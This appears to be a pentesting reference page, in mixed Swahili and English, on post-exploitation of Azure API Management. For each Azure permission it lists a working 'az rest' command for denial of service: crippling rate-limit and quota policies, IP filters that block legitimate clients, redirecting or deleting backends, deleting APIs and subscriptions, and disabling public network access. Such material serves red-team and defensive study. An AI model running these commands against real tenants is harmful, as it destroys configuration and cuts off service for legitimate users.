4.1 KiB
Azure - API Management Post-Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Microsoft.ApiManagement/service/apis/policies/write or Microsoft.ApiManagement/service/policies/write
Attacker anaweza kutumia multiple vectors kusababisha denial of service. Ili kuzuia legitimate traffic, attacker anaongeza rate-limiting na quota policies zenye thamani za chini mno, kwa ufanisi kuzuia normal access:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
Ili kuzuia anwani maalum za IP za wateja halali, mshambuliaji anaweza kuongeza sera za kuchuja IP zinazokataa maombi kutoka kwa anwani zilizochaguliwa:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
Microsoft.ApiManagement/service/backends/write au Microsoft.ApiManagement/service/backends/delete
Kwa kusababisha maombi yafeli, mshambuliaji anaweza kubadilisha usanidi wa backend na kubadilisha URL yake kuwa anwani isiyo halali au isiyofikika:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'
Au futa backends:
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"
Microsoft.ApiManagement/service/apis/delete
Ili kufanya APIs muhimu zisipatikane, mshambulizi anaweza kuzifuta moja kwa moja kutoka kwenye API Management service:
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"
Microsoft.ApiManagement/service/write or Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action
Ili kuzuia ufikisho kutoka kwenye Internet, mshambuliaji anaweza kuzima ufikisho wa mtandao wa umma kwenye API Management service:
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'
Microsoft.ApiManagement/service/subscriptions/delete
Ili kuzuia upatikanaji kwa watumiaji halali, mshambuliaji anaweza kufuta API Management subscriptions:
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"
{{#include ../../../banners/hacktricks-training.md}}